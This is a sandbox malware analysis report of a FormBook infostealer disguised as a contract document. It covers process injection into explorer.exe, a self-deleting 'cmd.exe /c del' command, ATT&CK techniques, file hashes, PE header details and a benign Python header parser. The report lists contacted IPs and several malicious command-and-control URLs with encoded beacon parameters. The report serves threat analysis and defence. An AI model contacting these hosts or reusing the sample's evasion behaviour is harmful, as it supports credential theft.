      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe | Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1340000
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe | Process created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmp | Binary or memory string: Progman
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe | Code function: 1_2_02264A17 cpuid

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match | File source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY
      Yara detected Generic Dropper
      Source: Yara match | File source: Process Memory Space: chkdsk.exe PID: 392, type: MEMORY
      Source: Yara match | File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match | File source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Virtualization/Sandbox Evasion21 | OS Credential Dumping | Security Software Discovery721 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection512 | LSASS Memory | Virtualization/Sandbox Evasion21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol4 | SIM Card Swap | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | System Information Discovery311 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings

      Behavior Graph

      [Behavior graph rendered as an image in the original; recoverable information:] Behavior Graph ID: 358403, Sample: UAE CONTRACT SUPPLY.exe, Startdate: 25/02/2021, Architecture: WINDOWS, Score: 100
      Process chain: UAE CONTRACT SUPPLY.exe -> UAE CONTRACT SUPPLY.exe -> explorer.exe (injected) -> chkdsk.exe and autoconv.exe; chkdsk.exe -> cmd.exe -> conhost.exe
      Network nodes: the second UAE CONTRACT SUPPLY.exe instance contacts googlehosted.l.googleusercontent.com (142.250.184.65, port 443) and doc-08-78-docs.googleusercontent.com; the injected explorer.exe contacts td-balancer-dc11-60-102.wixdns.net (185.230.60.102, port 80), allsalesvinyl.net (34.102.136.180) and 10 other IPs or domains


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      UAE CONTRACT SUPPLY.exe | 34% | Virustotal |
      UAE CONTRACT SUPPLY.exe | 37% | ReversingLabs | Win32.Trojan.Vebzenpak

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      16.2.chkdsk.exe.5bc7960.5.unpack | 100% | Avira | TR/Dropper.Gen
      16.2.chkdsk.exe.fd4f08.1.unpack | 100% | Avira | TR/Dropper.Gen

      Domains

      Source | Detection | Scanner | Label
      td-balancer-dc11-60-102.wixdns.net | 0% | Virustotal |

      Domains and IPs

      Contacted IPs


      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      142.250.184.65 | unknown | United States | 15169 | GOOGLEUS | false
      185.230.60.102 | unknown | Israel | 58182 | WIX_COMIL | true
      104.21.32.11 | unknown | United States | 13335 | CLOUDFLARENETUS | true
      34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true

      General Information

      Joe Sandbox Version: 31.0.0 Emerald
      Analysis ID: 358403
      Start date: 25.02.2021
      Start time: 15:25:36
      Joe Sandbox Product: CloudBasic
      Overall analysis duration: 0h 9m 19s
      Hypervisor based Inspection enabled: false
      Report type: light
      Sample file name: UAE CONTRACT SUPPLY.exe
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of new started processes analysed: 23
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 1
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Detection: MAL
      Classification: mal100.troj.spyw.evad.winEXE@8/0@10/4
      EGA Information: Failed
      HDC Information:
      • Successful, ratio: 53% (good quality ratio 44%)
      • Quality average: 66.4%
      • Quality standard deviation: 35.8%
      HCA Information:
      • Successful, ratio: 61%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .exe
      Warnings:
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
      • TCP Packets have been reduced to 100
                                                        • Excluded IPs from analysis (whitelisted): 104.42.151.234, 23.211.6.115, 104.43.139.144, 142.250.184.46, 51.104.139.180, 52.155.217.156, 20.54.26.129, 8.248.147.254, 67.27.233.254, 67.27.159.254, 8.248.143.254, 67.26.83.254, 51.103.5.159, 104.43.193.48, 92.122.213.194, 92.122.213.247, 2.17.179.193, 13.64.90.137, 184.30.20.56, 51.11.168.160
                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        Match: 185.230.60.102
                                                        Associated Sample Name / URL | Detection | Context
                                                        2S6VUd960E.exe | malicious | www.thepoetrictedstudio.com/bw82/?JB4DY2=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHK6M8xRYK4Gq&w0G=jzuDZX7xC

                                                        Match: 34.102.136.180
                                                        Associated Sample Name / URL | Detection | Context
                                                        14079 Revised #PO 4990.exe | malicious | www.ubiqshop.com/suod/
                                                        twistercrypted.exe | malicious | www.whitley360insurancegroup.com/e3rp/?j8pPk=im8RK5hojyiovjoWpCByoAyExdKu9PCH/DHixFeIJgIWbd9/JUshX+E76zrtzOGwSvQG&iJ=yL3dpJexppT
                                                        dCoLEiYyx1.exe | malicious | www.wewantvote.com/hks/?S2Jdyv=JR-TT8a8bz4&o2=QYUxBxXkCeZVJNfFWSJsk3IBeYXPZgc2nH/dDvQY/XbZkPs+fhYBerosKyprHHiIEPgfedaFww==
                                                        GDJWHqItQO.exe | malicious | www.lesavonbyannvictoria.com/dyt/?w8l=2w8yK74E/w9lysTpUayEk1uIR8qyDanCFlUeVmIM4yvirp/OCQwAlXgQpx9jKZ5pn0hJ&Tj-=YvLpZ
                                                        Shipment Document BL,INV and packing list.exe | malicious | www.parkcitysongfest.com/nehc/?Jnz=9rSpeXq0adO&yrsDIlWx=LMAhfecU0y34Tx1TbWeWAS4HEN0+4+sZND0z+5CMXKz3uB8Td4f40r/k+tJO9eUuw3oDNFlv+g==
                                                        PO_210224.exe | malicious | www.jeetinternationalgroup.com/kbc/?mlvx=rTYX5btw1iIIHoMYt3wFv5EHXrCgun0pSs+f973Cl/VGhbEqDDvdvpBnQB7WKQvfWEf2&Ntilqd=8p4pqfAhA
                                                        2021_02_25.exe | malicious | www.bistrolartichaut.com/gbr/?kDHl=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIdVdDj4pEKFF2KGGA==&Kzr4=SnjtLZExJt
                                                        55gfganfgF.exe | malicious | www.gdsjgf.com/bw82/?_FQl2b=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXZHtOEFX/CqJe2Vx/Q==&oX9=Z0D4XL4pfLe8-hP
                                                        yrsTO0ER4V.exe | malicious | www.bitcoinrewardsu.info/kre/?YvBxMNmh=kQkeQIpKJNb6oOxJN4GJfD6t5KY2AsRnmRWhQl1X7YIrKxWbjtaZnp5PaacD5HNrGJbroy9C/A==&_jATiR=UfdDO4MxCVo
                                                        RQP_10378065.exe | malicious | www.ikescakes.com/mt6e/?mtxhc=YvExCURCHojWxUZ2uMbCTZtdlUfUNESptwc+9N4MwoafLt15MUIAAry7fUZG5aHTuU8f+mfXxQ==&rVXHzf=lnRpL0YpGPdD
                                                        Price quotation.exe | malicious | www.womenreadytomove.com/uidr/?pRrXnjX=+yHJuk7akGgRjMzjPF0aFAvqX/p+12T9a3qHSG6UxUVEi0VJLVtNHRJTw/YZCKaLJ9IS&NtTD4P=XPjPRje8qFgxsfb
                                                        DHL Shipping Document_Pdf.exe | malicious | www.elementclubhouse.com/dll/?ArDDXx=WR3E3vwyc/GreSyJ7XmSowICMkI8sNumnp0OkvNXbOz2Qb0q9qTQClQxRjHoqSrBttUl&VnwDZ=-Z2hAFrpEtCxkjI
                                                        MT.Au Leo V.1420.xlsx | malicious | www.hakimkhawatmi.com/nsag/?jv84=9Tl2KXc7hN/2U9N9+vpX/czO0Yy7ZBOWuVeFqMNCcJII52Iatjzlz6fsfLitv4s31iy/dQ==&1bCd=jpXpdpDpF
                                                        dwg.exe | malicious | www.kreatelymedia.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ
                                                        orders.exe | malicious | www.suncobrayoga.com/ni6e/?W6=+pZLjlAoRu3DtzXq35lSkEUB/ZsZHJe08VokdK2HVDHLsmWw5RNCvrmnDtoZrYQiiN4bm+0CXw==&UlPt=GVoxsVvHVpd8Sl
                                                        Order List - 022321-xlxs.exe | malicious | www.hk-attorneys.com/uqf5/?Y4pXFx5x=Dg97rDlyoxn6rzyVbv3B7zG329WThiiFJjF/QU5oHVDRmmZSVK6c1XVEPf5rJpTqyNbYXr1Rqw==&BR-=UTjHnDN0Jp9hlD
                                                        9VZe9OnL4V.exe | malicious | www.vio-lence-official.com/mjs/?ohoDP=Szrhs8&EzrxBfhH=Km50rYfCIMLkr6cNBQUAIfaJzg7DBzOfrqOCbjSFoXRiVQSa2PRHXyZRZ9uV6+yeKg7N
                                                        3zutY8IPBS.exe | malicious | www.chapelcouture.com/ffw/?uZCX=XPjPaXeHqZ5XiDl&Jzr8URRX=Q3EGYcSU8t2GK6ftjW66hePdz5cilHQXw0NtnM1D8Yj3A1BwaX/+ESmEZzWdZeCCWyTt
                                                        IKtgCGdzlg.exe | malicious | www.srcsvcs.com/bw82/?9rjHF6y=idg9JX97F3eVuJ82V/BLVAmaLrIGTHqm4FsH2lIA1Y64HTHcmGyQxV9x71/09hThPInxOEDyHA==&lX9d=p48hVnrp1tqPRT7P
                                                        U6RI0SDRS2.exe | malicious | www.wholesalerbargains.com/nsag/?GVgT1=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU4mnryJvfB01hf9UaA==&6l=SlSp

                                                        Domains

                                                        Match: googlehosted.l.googleusercontent.com
                                                        Associated Sample Name / URL | Detection | Context
                                                        BL.html | malicious | 142.250.186.33
                                                        caraganas.exe | malicious | 142.250.186.33
                                                        #U266b VM_540283.htm | malicious | 142.250.186.33
                                                        _vm54959395930.htm | malicious | 142.250.186.33
                                                        Malone3388_001.htm | malicious | 142.250.186.33
                                                        dgaTCZovz.msi | malicious | 142.250.186.33
                                                        2021-Nieuwepayroll-Aanpassing.html | malicious | 142.250.186.33
                                                        seed.exe | malicious | 142.250.186.33
                                                        PO112000891122110.exe | malicious | 142.250.186.33
                                                        GUEROLA INDUSTRIES N#U00ba de cuenta.exe | malicious | 142.250.186.33
                                                        xerox for hycite.htm | malicious | 142.250.186.33
                                                        Muligheds.exe | malicious | 142.250.186.33
                                                        2021-Nouvelle masse salariale-Rapport.html | malicious | 216.58.209.33
                                                        SOLICITUD DE HERJIMAR, SL (HJM-745022821).exe | malicious | 216.58.208.161
                                                        #U6211#U662f#U56fe#U7247.exe | malicious | 216.58.208.161
                                                        OneNote rmos@dataflex-int.com.html | malicious | 216.58.208.129
                                                        Sponsor A Child, Best Online Donation Site, Top NGO - World Vision India.html | malicious | 172.217.20.225
                                                        barcelona-v-psg-liv-uefa-2021.html | malicious | 172.217.20.225
                                                        Barcelona-v-PSG-0tv.html | malicious | 172.217.20.225
                                                        CONSTRUCCIONES SAN MART#U00cdN, S.A. SOLICITAR. (SMT-14517022021).exe | malicious | 172.217.20.225

                                                        Match: td-balancer-dc11-60-102.wixdns.net
                                                        Associated Sample Name / URL | Detection | Context
                                                        2S6VUd960E.exe | malicious | 185.230.60.102

                                                        ASN

                                                        Match: WIX_COMIL
                                                        Associated Sample Name / URL | Detection | Context
                                                        NEW ORDER - VOLVO HK HKPO2102-13561,pdf.exe | malicious | 185.230.60.177
                                                        2S6VUd960E.exe | malicious | 185.230.60.102
                                                        https://alijafari6.wixsite.com/owa-projection-aspx | malicious | 185.230.61.98
                                                        https://xmailexpact.wixsite.com/mysite | malicious | 185.230.61.179
                                                        http://vcomdesign.com | malicious | 185.230.61.180
                                                        https://samson442.wixsite.com/outlook-web | malicious | 185.230.60.197
                                                        http://tecasi.rs/tree/?email=adsdkljfds.sadkf@asdkg.com | malicious | 185.230.60.163
                                                        https://infozapyt.wixsite.com/mysite | malicious | 185.230.60.179
                                                        https://brechi5.wixsite.com/owa-webmail-updates | malicious | 185.230.61.179
                                                        Swift Copy.exe | malicious | 185.230.61.96
                                                        MOI Support ship V2.docx | malicious | 185.230.61.180
                                                        MOI Support ship V2.docx | malicious | 185.230.61.168
                                                        MOI Support ship V2.docx | malicious | 185.230.61.168
                                                        MOI Support ship V2.docx | malicious | 185.230.61.101
                                                        MOI Support ship V2.docx | malicious | 185.230.61.180
                                                        https://imsva91-ctp.trendmicro.com/wis/clicktime/v1/query?url=http%3a%2f%2ftecasi.rs%2fPAF&umid=EF9759F9-B31F-8705-A867-F303FCD5E066&auth=25994e11723456f59f881b7e4162635112e7401d-23077e0b296f1a694cd81697d46ee85967e5556e | malicious | 185.230.60.180
                                                        https://outlookonedriveupd.wixsite.com/office | malicious | 185.230.60.98
                                                        https://ademkeskin.wixsite.com/owa-projection-aspx | malicious | 185.230.61.163
                                                        https://outlookmicrosoftwo.wixsite.com/upgrade | malicious | 185.230.60.98
                                                        https://www.shutdown-turnaround-industry-network.com/unsubscribe | malicious | 185.230.60.177

                                                        Match: GOOGLEUS
                                                        Associated Sample Name / URL | Detection | Context
                                                        14079 Revised #PO 4990.exe | malicious | 34.102.136.180
                                                        twistercrypted.exe | malicious | 34.102.136.180
                                                        Tide_v2.49.0_www.9apps.com_.apk | malicious | 142.250.184.74
                                                        tuOAqyHVuH.exe | malicious | 35.228.227.140
                                                        WB4L25Jv37.exe | malicious | 35.228.227.140
                                                        Tide_v2.49.0_www.9apps.com_.apk | malicious | 142.250.186.106
                                                        BL.html | malicious | 142.250.186.33
                                                        PrebuiltGmsCore.apk | malicious | 172.217.16.142
                                                        PrebuiltGmsCore.apk | malicious | 142.250.186.138
                                                        C1 PureQuest PO S1026710.xlsm | malicious | 142.250.186.66
                                                        dCoLEiYyx1.exe | malicious | 34.102.136.180
                                                        GDJWHqItQO.exe | malicious | 34.102.136.180
                                                        C1 PureQuest PO S1026710.xlsm | malicious | 142.250.186.66
                                                        2o0y7CvHF2.exe | malicious | 35.187.82.108
                                                        C1 PureQuest PO S1026710.xlsm | malicious | 142.250.186.66
                                                        kBJlVQuchM.exe | malicious | 216.239.32.21
                                                        RODFm7tAfQ.exe | malicious | 35.228.227.140
                                                        zk8Jq3gpa5.exe | malicious | 35.228.227.140
                                                        Shipment Document BL,INV and packing list.exe | malicious | 34.102.136.180
                                                        rtofwqxq.exe | malicious | 216.58.212.131

                                                        JA3 Fingerprints

                                                        Match: 37f463bf4616ecd445d4a1937da06e19
                                                        Associated Sample Name / URL | Detection | Context
                                                        CustomerStatement.exe | malicious | 142.250.184.65
                                                        Payment.html | malicious | 142.250.184.65
                                                        EmployeeAnnualReport.exe | malicious | 142.250.184.65
                                                        Customer Statement.exe | malicious | 142.250.184.65
                                                        Remittance advice.htm | malicious | 142.250.184.65
                                                        Customer Statement.exe | malicious | 142.250.184.65
                                                        Order-10236587458.exe | malicious | 142.250.184.65
                                                        RFQ_110199282773666355627277288.exe | malicious | 142.250.184.65
                                                        EMG 3.0.exe | malicious | 142.250.184.65
                                                        QUOTATION.xlsx | malicious | 142.250.184.65
                                                        VM_629904-26374.htm | malicious | 142.250.184.65
                                                        cm0Ubgm8Eu.exe | malicious | 142.250.184.65
                                                        caraganas.exe | malicious | 142.250.184.65
                                                        Notification 466022.xlsm | malicious | 142.250.184.65
                                                        Fax #136.xlsm | malicious | 142.250.184.65
                                                        Purchase Order22420.exe | malicious | 142.250.184.65
                                                        ceFlxYfe4F.exe | malicious | 142.250.184.65
                                                        Fatura.exe | malicious | 142.250.184.65
                                                        Reports #176.xlsm | malicious | 142.250.184.65
                                                        SecuriteInfo.com.VB.Heur2.EmoDldr.5.B611173F.Gen.18420.xlsm | malicious | 142.250.184.65

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        No created / dropped files found

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):4.293725930665568
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.15%
                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:UAE CONTRACT SUPPLY.exe
                                                        File size:458752
                                                        MD5:9da74a6d583c801677c0e2fde51586ba
                                                        SHA1:e1af77b99ca69e4737fa4d73a77e5702d5c13e91
                                                        SHA256:9d295dd246f6844b1bfe945cdf914a1615d0dacd9aa9f40d1276bc75f796268c
                                                        SHA512:d3bc9d90d2ce4945bc4cf3d8108272f88bd24e7bc12de99c5a3a36043a4728b2865f97d64c59bc9fcb9f80cd5c87e33cad5d0b3b8157a54591b85cdcf0a16328
                                                        SSDEEP:1536:3bLxrsc45V0M8wBEzkXZ8RuMI8sFjE2ik+W65tikWmBaHHG7:LLTSuMBezkUu8WjE2Z+DtikWmBaHHG7
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L.....!Z.................0..........H........@....@

                                                        File Icon

                                                        Icon Hash:e886a37159aadcf8

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x401348
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:
                                                        Time Stamp:0x5A21D1E1 [Fri Dec 1 22:04:17 2017 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:c6ebaa5f331077d9c6c3ae892d7a39ce
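The Python script below is an added example, not part of the Joe Sandbox report, that reproduces the fields listed under Static PE Info (timestamp decoding, entrypoint VA, image base, subsystem, characteristics flags, DLL characteristics) and the "Entropy (8bit)" value under Static File Info. Because the sample itself is not on the page, it runs by default on a constructed minimal PE32 header that carries the report's values (0x5A21D1E1, 0x401348, 0x400000, characteristics 0x010F, empty DllCharacteristics); the header offsets come from winnt.h. Pass a file path on the command line to run it against a real binary.

```python
"""Decode Static PE Info fields and the 8-bit entropy of a PE file.

Added example, not part of the Joe Sandbox report. build_constructed_pe_header()
returns a hand-made minimal header carrying the report's values; it is not
the sample itself.
"""
import math
import struct
import sys
from collections import Counter
from datetime import datetime, timezone

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h), the ones a loader cares about
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}
DLLCHAR_DYNAMIC_BASE = 0x0040   # opts the image into ASLR
DLLCHAR_NX_COMPAT = 0x0100      # opts the image into DEP


def build_constructed_pe_header() -> bytes:
    """Constructed PE32 image with no sections: DOS header (e_lfanew = 0x40),
    'PE\\0\\0', IMAGE_FILE_HEADER (20 bytes), IMAGE_OPTIONAL_HEADER32 (96 bytes,
    no data directories). Field values are the ones the report lists."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew
    file_hdr = struct.pack("<HHIIIHH",
                           0x014C,      # Machine: i386
                           0,           # NumberOfSections
                           0x5A21D1E1,  # TimeDateStamp
                           0, 0,        # symbol table pointer / count
                           0x60,        # SizeOfOptionalHeader
                           0x010F)      # Characteristics
    opt = bytearray(0x60)
    struct.pack_into("<H", opt, 0, 0x10B)                   # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x1348)                 # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)               # ImageBase
    struct.pack_into("<HHHHHH", opt, 40, 4, 0, 4, 0, 4, 0)  # OS / image / subsystem version 4.0
    struct.pack_into("<HH", opt, 68, 2, 0)                  # Subsystem GUI, DllCharacteristics empty
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0); packed or
    encrypted payloads push a file toward 8, this sample sits near 4.3."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> NT headers and return the fields shown in the
    report. Raises ValueError for anything that is not a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, nsec, ts, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, fh)
    oh = fh + 20
    magic = struct.unpack_from("<H", data, oh)[0]
    if magic != 0x10B:
        raise ValueError("not a PE32 optional header (magic 0x%X)" % magic)
    entry_rva = struct.unpack_from("<I", data, oh + 16)[0]
    image_base = struct.unpack_from("<I", data, oh + 28)[0]
    os_maj, os_min, _, _, ss_maj, ss_min = struct.unpack_from("<HHHHHH", data, oh + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, oh + 68)
    return {
        "machine": machine,
        "sections": nsec,
        "timestamp": ts,
        "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "entrypoint": image_base + entry_rva,
        "image_base": image_base,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "characteristics": [name for bit, name in CHARACTERISTICS.items() if chars & bit],
        "dll_characteristics": dll_chars,
        "os_version": (os_maj, os_min),
        "subsystem_version": (ss_maj, ss_min),
        # ASLR needs DYNAMIC_BASE set and relocations present; DEP needs NX_COMPAT
        "aslr": bool(dll_chars & DLLCHAR_DYNAMIC_BASE) and not (chars & 0x0001),
        "dep": bool(dll_chars & DLLCHAR_NX_COMPAT),
    }


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_pe_header()
    for key, value in parse_pe(blob).items():
        shown = hex(value) if isinstance(value, int) and not isinstance(value, bool) else value
        print(f"{key:>20}: {shown}")
    print(f"{'entropy (8bit)':>20}: {shannon_entropy(blob):.4f}")
```

Two practitioner notes follow from the decoded values. The empty DLL Characteristics field together with RELOCS_STRIPPED means the image neither opts into ASLR (no DYNAMIC_BASE) nor DEP (no NX_COMPAT) and could not be rebased anyway, which is typical for VB6 builds. The TimeDateStamp is attacker-controlled data in the header, so the December 2017 value on a sample circulating in 2021 is a pivot for clustering, not evidence of when the binary was built.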

                                                        Entrypoint Preview

                                                        Instruction
                                                        push 00404264h
                                                        call 00007F29048150D5h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        cmp byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        and ah, bl
                                                        sub byte ptr [edx+42BA4D36h], FFFFFF8Eh
                                                        arpl word ptr [edi-2A28310Fh], si
                                                        rol byte ptr [eax], cl
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [edx+00h], al
                                                        push es
                                                        push eax
                                                        add dword ptr [ecx], 54h
                                                        jc 00007F2904815147h
                                                        add byte ptr fs:[eax], bl
                                                        add eax, dword ptr [eax]
                                                        add byte ptr [eax], al
                                                        add bh, bh
                                                        int3
                                                        xor dword ptr [eax], eax
